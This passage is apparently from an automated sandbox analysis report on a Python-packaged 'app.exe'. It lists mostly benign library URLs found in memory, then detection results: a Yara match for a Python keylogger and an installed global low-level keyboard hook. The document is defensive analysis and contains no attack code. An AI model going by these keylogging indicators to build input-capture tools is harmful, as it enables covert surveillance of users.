    Source: app.exe, 00000000.00000003.2072724611.0000022254569000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/ronaldoussoren/altgraph/workflows/Lint/badge.svg
    Source: app.exe, 00000000.00000003.2072724611.0000022254569000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/ronaldoussoren/altgraph/workflows/Test/badge.svg
    Source: app.exe, 00000000.00000003.2075202474.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rthalley/dnspython.git
    Source: app.exe, 00000000.00000003.2075202474.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rthalley/dnspython/actions/)
    Source: app.exe, 00000000.00000003.2075202474.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rthalley/dnspython/actions/workflows/python-package.yml/badge.svg)
    Source: app.exe, 00000000.00000003.2075202474.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rthalley/dnspython/issues
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/Julian
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/Julian/
    Source: app.exe, 00000002.00000003.2080546887.0000020830B3C000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2083861282.0000020830B3C000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2083861282.0000020830B6B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2085786399.0000020830B2E000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2080546887.0000020830B6B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2080992141.0000020830B3C000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2085120862.0000020830B2E000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2085120862.0000020830B6B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3277037650.0000020830ABE000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2082241972.0000020830B6B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2082241972.0000020830B3C000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3277037650.0000020830B62000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2085786399.0000020830B6B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2080992141.0000020830B6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
    Source: app.exe, 00000002.00000002.3278071149.0000020833029000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2092269988.0000020833029000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
    Source: app.exe, 00000002.00000002.3278071149.0000020833029000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2092269988.0000020833029000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
    Source: app.exe, 00000000.00000003.2074056196.000002225456B000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://groups.google.com/forum/#
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
    Source: app.exe, 00000002.00000003.2092406123.000002083A0B8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2092269988.0000020833029000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3283351198.000002083A09C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/post
    Source: app.exe, 00000000.00000003.2075202474.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/badge/License-ISC-brightgreen.svg)
    Source: app.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/badge/skeleton-2024-informational
    Source: app.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/charliermarsh/ruff/main/assets
    Source: app.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/pyversions/importlib_metadata.svg
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/pyversions/jsonschema.svg
    Source: app.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
    Source: app.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/importlib_metadata.svg
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/jsonschema.svg
    Source: app.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importlib-metadata.readthedocs.io/
    Source: app.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importlib-metadata.readthedocs.io/en/latest/?badge=latest
    Source: app.exe, 00000002.00000002.3278380634.00000208331A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
    Source: app.exe, 00000002.00000002.3277731557.0000020832BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipython.org
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org
    Source: app.exe, 00000002.00000002.3277731557.0000020832BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
    Source: app.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://metacpan.org/pod/distribution/Math-Cephes/lib/Math/Cephes.pod#i0:-Modified-Bessel-function-o
    Source: app.exe, 00000002.00000002.3277731557.0000020832BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://numpy.org
    Source: app.exe, 00000002.00000003.2092269988.0000020832F47000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3282681309.0000020839CA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://numpy.org/devdocs/release/1.20.0-notes.html#deprecations
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3282611585.0000020839C50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://numpy.org/doc/stable/reference/random/index.html
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://numpy.org/neps/nep-0013-ufunc-overrides.html
    Source: app.exe, 00000002.00000002.3278071149.0000020832EC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
    Source: app.exe, 00000000.00000003.2075202474.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://opensource.org/licenses/ISC)
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://optimized-einsum.readthedocs.io/en/stable/
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://people.eecs.berkeley.edu/~wkahan/ieee754status/IEEE754.PDF
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://personal.math.ubc.ca/~cbm/aands/page_379.htm
    Source: app.exe, 00000002.00000002.3286498448.00007FF8A8402000.00000002.00000001.01000000.00000014.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://personal.math.ubc.ca/~cbm/aands/page_67.htm
    Source: app.exe, 00000002.00000002.3286498448.00007FF8A8402000.00000002.00000001.01000000.00000014.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://personal.math.ubc.ca/~cbm/aands/page_69.htm
    Source: app.exe, 00000002.00000002.3286498448.00007FF8A8402000.00000002.00000001.01000000.00000014.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://personal.math.ubc.ca/~cbm/aands/page_79.htm
    Source: app.exe, 00000002.00000002.3286498448.00007FF8A8402000.00000002.00000001.01000000.00000014.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://personal.math.ubc.ca/~cbm/aands/page_83.htm
    Source: app.exe, 00000002.00000002.3286498448.00007FF8A8402000.00000002.00000001.01000000.00000014.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://personal.math.ubc.ca/~cbm/aands/page_86.htm
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pip.pypa.io/en/stable/
    Source: app.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/cryptography/
    Source: app.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/importlib_metadata
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/jsonschema/
    Source: app.exe, 00000002.00000002.3282781695.0000020839DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/numpy-financial
    Source: app.exe, 00000002.00000002.3282781695.0000020839DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/numpy-financial$0
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.python.org/pypi/keyboard/):
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://python-jsonschema.readthedocs.io/
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://python-jsonschema.readthedocs.io/en/latest/api/jsonschema/protocols/#jsonschema.protocols.Va
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://python-jsonschema.readthedocs.io/en/latest/api/jsonschema/validators/#jsonschema.validators.
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://python-jsonschema.readthedocs.io/en/latest/errors/
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://python-jsonschema.readthedocs.io/en/latest/validate/#validating-formats
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://python-jsonschema.readthedocs.io/en/stable/
    Source: app.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
    Source: app.exe, 00000000.00000003.2075202474.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/dnspython/badge/?version=latest)
    Source: app.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/importlib-metadata/badge/?version=latest
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/python-jsonschema/badge/?version=stable&style=flat
    Source: app.exe, 00000002.00000002.3278572779.00000208332F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://refspecs.linuxfoundation.org/elf/gabi4
    Source: app.exe, 00000002.00000002.3284318756.000002083A940000.00000004.00001000.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://results.pre-commit.ci/badge/github/python-jsonschema/jsonschema/main.svg
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://results.pre-commit.ci/latest/github/python-jsonschema/jsonschema/main
    Source: app.exe, 00000002.00000002.3278071149.0000020832EC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scipy-cookbook.readthedocs.io/items/Ctypes.html
    Source: app.exe, 00000002.00000003.2087818270.0000020832EC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html
    Source: app.exe, 00000002.00000003.2088649225.0000020832C7C000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3277731557.0000020832BC0000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2088340207.0000020832C7C000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2087818270.0000020832EC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
    Source: app.exe, 00000002.00000002.3278039696.0000020832E80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages
    Source: app.exe, 00000002.00000003.2087818270.0000020832EC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr&
    Source: app.exe, 00000002.00000003.2087818270.0000020832EC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr&r
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: https://stat.ethz.ch/~stahel/lognormal/bioscience.pdf
    Source: app.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/badges/package/pypi/importlib-metadata
    Source: app.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-importlib-metadata?utm_source=pypi-importlib-met
    Source: app.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-importlib-metadata?utm_source=pypi-importlib-metadata&utm
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-jsonschema?utm_source=pypi-j
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-jsonschema?utm_source=pypi-jsonschema&utm_medium=referral
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
    Source: app.exe, 00000002.00000002.3283351198.000002083A0C2000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3278071149.0000020832F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3610
    Source: app.exe, 00000002.00000002.3278071149.0000020832F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc5297
    Source: app.exe, 00000002.00000002.3283351198.000002083A002000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
    Source: app.exe, 00000002.00000002.3283179009.0000020839F50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
    Source: app.exe, 00000002.00000002.3282846768.0000020839DF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.archive.org/web/20080221202153/https://www.math.hmc.edu/~benjamin/papers/CombTrig.pdf
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288287065.00007FF8A8E60000.00000004.00000001.01000000.00000019.sdmpString found in binary or memory: https://web.archive.org/web/20090423014010/http://www.brighton-webs.co.uk:80/distributions/wald.asp
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: https://web.archive.org/web/20090514091424/http://brighton-webs.co.uk:80/distributions/rayleigh.asp
    Source: app.exe, 00000002.00000003.2088609981.0000020832FD8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3277731557.0000020832BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz
    Source: app.exe, 00000000.00000003.2074628570.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/
    Source: app.exe, 00000000.00000003.2074698244.0000022254576000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2074628570.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2074628570.0000022254576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
    Source: app.exe, 00000002.00000002.3278244921.00000208330C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
    Source: app.exe, 00000002.00000002.3278071149.0000020833029000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2092269988.0000020833029000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/z(sid=079cbb01-8f44-4dc6-8fd0-3df76e4ee289)
    Source: cacert.pem.0.drString found in binary or memory: https://www.catcert.net/verarrel
    Source: app.exe, 00000000.00000003.2068105336.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3289485767.00007FF8B27CC000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: https://www.cs.hmc.edu/tr/hmc-cs-2014-0905.pdf
    Source: app.exe, 00000000.00000003.2069526633.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2065300769.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254572000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2068834317.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2048636747.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040089170.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040240547.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2041102002.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
    Source: app.exe, 00000000.00000003.2075202474.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dnspython.org
    Source: app.exe, 00000002.00000002.3278071149.0000020832F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: https://www.itl.nist.gov/div898/handbook/eda/section3/eda3663.htm
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: https://www.itl.nist.gov/div898/handbook/eda/section3/eda3666.htm
    Source: app.exe, 00000000.00000003.2068528399.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: https://www.itl.nist.gov/div898/software/dataplot/refman2/auxillar/powpdf.pdf
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mathworks.com/help/techdoc/ref/rank.html
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openblas.net/
    Source: app.exe, 00000000.00000003.2065300769.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3287399981.00007FF8A8809000.00000002.00000001.01000000.00000010.sdmp, app.exe, 00000002.00000002.3288536168.00007FF8A8F38000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: https://www.openssl.org/H
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
    Source: app.exe, 00000002.00000002.3282611585.0000020839C50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0506/
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zenodo.org/badge/3072629.svg
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zenodo.org/badge/latestdoi/3072629

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Yara detected Python Keylogger
    Source: Yara matchFile source: Process Memory Space: app.exe PID: 4308, type: MEMORYSTR
    Installs a global keyboard hook
    Source: C:\Users\user\Desktop\app.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\app.exeJump to behavior
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACEA4D500_2_00007FF7ACEA4D50
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE867600_2_00007FF7ACE86760
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACEA5C9C0_2_00007FF7ACEA5C9C
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE91DA00_2_00007FF7ACE91DA0
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE90EE40_2_00007FF7ACE90EE4
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE96EC80_2_00007FF7ACE96EC8
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE94E800_2_00007FF7ACE94E80
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE9D6480_2_00007FF7ACE9D648
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE966440_2_00007FF7ACE96644
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE9CFC80_2_00007FF7ACE9CFC8
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACEA4FCC0_2_00007FF7ACEA4FCC
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE966440_2_00007FF7ACE96644
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACEA57500_2_00007FF7ACEA5750
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE927300_2_00007FF7ACE92730
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACEA30FC0_2_00007FF7ACEA30FC
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE910F00_2_00007FF7ACE910F0
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACEA08E40_2_00007FF7ACEA08E4
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE908D00_2_00007FF7ACE908D0
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE9F9380_2_00007FF7ACE9F938
